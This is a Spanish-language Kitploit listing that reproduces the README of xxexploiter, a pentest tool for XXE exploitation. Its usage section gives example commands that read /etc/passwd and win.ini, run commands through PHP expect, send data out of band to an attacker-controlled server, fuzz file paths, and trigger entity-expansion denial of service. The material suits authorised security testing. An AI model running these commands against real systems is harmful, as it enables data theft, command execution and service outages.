Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
xxexploiter — Herramienta para ayudar a explotar vulnerabilidades XXE | Kitploit
Herramientas/GitHubGitHub/luisfontes19/xxexploiter
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebFuzzing
GitHubluisfontes19/xxexploiter

xxexploiter

Herramienta para ayudar a explotar vulnerabilidades XXE

Ver Repositorio
61570hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

XXExploiter

Build codecov Known Vulnerabilities License: MIT

XXExploiter

Genera los payloads XML y automáticamente inicia un servidor para servir los DTD necesarios o realizar exfiltración de datos.

Instalación

root@kitploit:~
#install node and npm if you don't have it yet 
npm install -g xxexploiter

Construcción y ejecución desde el código fuente

Esta es una aplicación Node simple escrita con TypeScript. Puedes compilarla como cualquier otra aplicación: (instala node y npm primero si no los tienes)

root@kitploit:~
npm install  
npm run build  
#you may need to npm install typescript -g in order for 'npm build' to succeed 

Para ejecutar la aplicación puedes hacerlo de una de estas 3 formas:

root@kitploit:~
npm start [args]  
node dist/index.js [args]  
npm link #and now just call xxexploiter

O puedes instalarla en tu sistema:

root@kitploit:~
npm link

Uso

root@kitploit:~
Usage: xxexploiter [command] [options]

Commands:
  xxexploiter file [file_to_read]  Use XXE to do a request
  xxexploiter request [URL]        Use XXE to do a request
  xxexploiter expect [command]     Use XXE to execute a command through PHP's expect
  xxexploiter xee [expantions]     Generate a huge content by resolving entities

Fuzzing Specific Options
  -w, --wordlist        Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
                        for the magic.
  -y, --success-string  String to search for a success response in the requests. Not usefull for blind attacks
  -n, --error-string    String to search for an error response in the request. Not usefull for blind attacks

Options:
  --version             Show version number                                                                    [boolean]
  -s, --server          Server address for OOB and DTD
  -p, --port            Server port for OOB and DTDs. Default: 7777
  -t, --template        path to an XML template where to inject payload
  -m, --mode            Extraction Mode: xml, oob, cdata. Default: xml
  -e, --encode          Extraction Encoding: none, phpbase64. Default: none
  -o, --output          Output for the XML payload file. Default is to console
  -x                    Use a request to automatically send the xml file
  -X, --request-output  Output the response from -x option. If not defined goes to stdout
  --verbose             Enable some messages help for understanding whats happening
  --doctype             Specify the name of the doctype to be injected. Default is xxexploiter
  -h, --help            Show help                                                                              [boolean]

Examples:
  xxexploiter expect ls
  xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml
  xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob
  xxexploiter xee 900000000 -o output.xml
  xxexploiter file /etc/passwd -x request.txt -t template.xml
  xxexploiter file /root/{FUZZ} -w wordlist.txt -n "not found" -x request.txt

Extra Info:
  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to
  be injected
  - When specifiying file paths for windows use forward slash.
  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
  Usefull with blind attacks
  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
  cdata
  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
  - When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
  or an expected success string

Ejemplos

Generación simple de payload

asciicast

Automatización de solicitud para enviar payload

asciicast

Extracción OOB con solicitud automatizada

asciicast

Fuzzing

asciicast

Algunas notas:

Si eliges usar el modo OOB o CDATA, XXExploiter generará el DTD necesario para ser incluido e iniciará un servidor para alojarlos. Ten en cuenta que si usas estas opciones debes configurar la dirección del servidor.

Si incluyes contenido en el cuerpo del XML, ten en cuenta que los caracteres restringidos de XML como '<' pueden romper el análisis, así que asegúrate de usar CDATA o el base64encode de PHP.

La mayoría de los lenguajes limitan el número de expansiones de entidades o la longitud total del contenido expandido, así que asegúrate de probar XEE primero en tu máquina, con las mismas condiciones que el objetivo.

Descargar herramienta